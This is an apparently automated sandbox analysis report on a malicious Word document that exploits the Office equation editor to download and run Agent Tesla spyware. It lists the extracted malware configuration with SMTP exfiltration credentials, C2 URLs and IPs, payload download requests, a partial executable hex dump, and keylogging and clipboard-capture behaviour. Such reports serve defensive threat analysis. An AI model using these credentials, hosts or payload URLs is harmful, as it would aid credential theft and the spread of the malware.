Analysis Report Pending Orders Statement -40064778.doc

AV Detection:

Found malware configuration

Source: poiuytrewsdfghjklmnbvcx.exe.2712.6.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "6a5HVZW", "URL: ": "https://xWUrFiDn0aBmFXBFM.net", "To: ": "edubrazil4040@longjohn.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "7piz2PrTT", "From: ": "edubrazil4040@longjohn.icu"}

Multi AV Scanner detection for submitted file

Source: Pending Orders Statement -40064778.doc	Virustotal: Detection: 41%			Perma Link
Source: Pending Orders Statement -40064778.doc	ReversingLabs: Detection: 47%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: Symwriter.pdb source: poiuytrewsdfghjklmnbvcx.exe
Source:	Binary string: .soap.pdb source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
Source:	Binary string: Symwriter.pdb!CorSymWriter_SxS;..\v1.1.4322\diasymreader.dllI00000000-0000-0000-C000-000000000046 source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: cy.kl-re.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.111.202.41:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.111.202.41:80

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://xWUrFiDn0aBmFXBFM.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 198.54.122.60:587

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 27 Jan 2021 18:29:36 GMTContent-Type: application/x-msdownloadContent-Length: 246784Connection: keep-aliveLast-Modified: Tue, 26 Jan 2021 23:18:29 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Nginx-Upstream-Cache-Status: EXPIREDX-Server-Powered-By: EngintronAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 a3 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b6 03 00 00 0c 00 00 00 00 00 00 1e d4 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 ac d0 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 d3 03 00 57 00 00 00 00 e0 03 00 e8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 03 00 00 20 00 00 00 b6 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 08 00 00 00 e0 03 00 00 0a 00 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 03 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 2e 00 00 d0 a4 03 00 0b 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a ba 72 5c 91 00 70 28 4e 03 00 0a 80 01 00 00 04 73 8a 00 00 0a 80 02 00 00 04 72 60 91 00 70 80 03 00 00 04 73 4f 03 00 0a 80 04 00 00 04 2a a6 72 d3 93 00 70 19 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8b 93 00 70 a2 25 18 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8f 93 00 70 a2 25 18 72 8b 93 00 70 a2 25 19 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 193.239.147.103 193.239.147.103
Source: Joe Sandbox View	IP Address: 198.54.122.60 198.54.122.60

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: BLACKNIGHT-ASIE BLACKNIGHT-ASIE

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 198.54.122.60:587

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET //power/bo/boobov.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cy.kl-re.comConnection: Keep-Alive

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D19B7C91-551E-40AF-9919-E039C2A6E74E}.tmp

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET //power/bo/boobov.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cy.kl-re.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive

Found strings which match to known social media urls

Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: cy.kl-re.com

Urls found in memory or binary data

Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://193.239.147.103
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106510969.0000000000736000.00000004.00000020.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.html
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358448912.0000000008426000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.comy
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349117316.00000000006E0000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F8008506.6.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349067363.000000000066D000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabD
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349067363.000000000066D000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enD
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://duylfM.com
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp	String found in binary or memory: http://mail.privateemail.com
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358077916.0000000008090000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.cr
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.com/1
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp	String found in binary or memory: https://ca.sia.it/seccli/repository/CPS/
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: poiuytrewsdfghjklmnbvcx.exe	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2350007415.0000000002B13000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2350002166.0000000002B0F000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp	String found in binary or memory: https://xWUrFiDn0aBmFXBFM.net

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Jump to behavior

Creates a window with clipboard capturing capabilities

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

.NET source code contains very large array initializations

Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b3DA6FFF0u002d7A4Cu002d4354u002dA44Au002d80CFFE9AEF36u007d/C8F0ECA3u002d36A1u002d4690u002d8D13u002d6EC07C1D3DE8.cs

Large array initialization: .cctor: array initializer size 11944

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 4_2_011E415D		4_2_011E415D
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 5_2_011E415D		5_2_011E415D
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 6_2_00402296		6_2_00402296
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 6_2_00225330		6_2_00225330
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 6_2_00226348		6_2_00226348
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 6_2_0022CB50		6_2_0022CB50
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 6_2_00222089		6_2_00222089
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Code function: 6_2_00225678		6_2_00225678

.NET source code contains calls to encryption/decryption functions

Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Classification label

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@8/13@11/3

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$nding Orders Statement -40064778.doc

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCC34.tmp

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Queries process information (via WMI, Win32_Process)

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
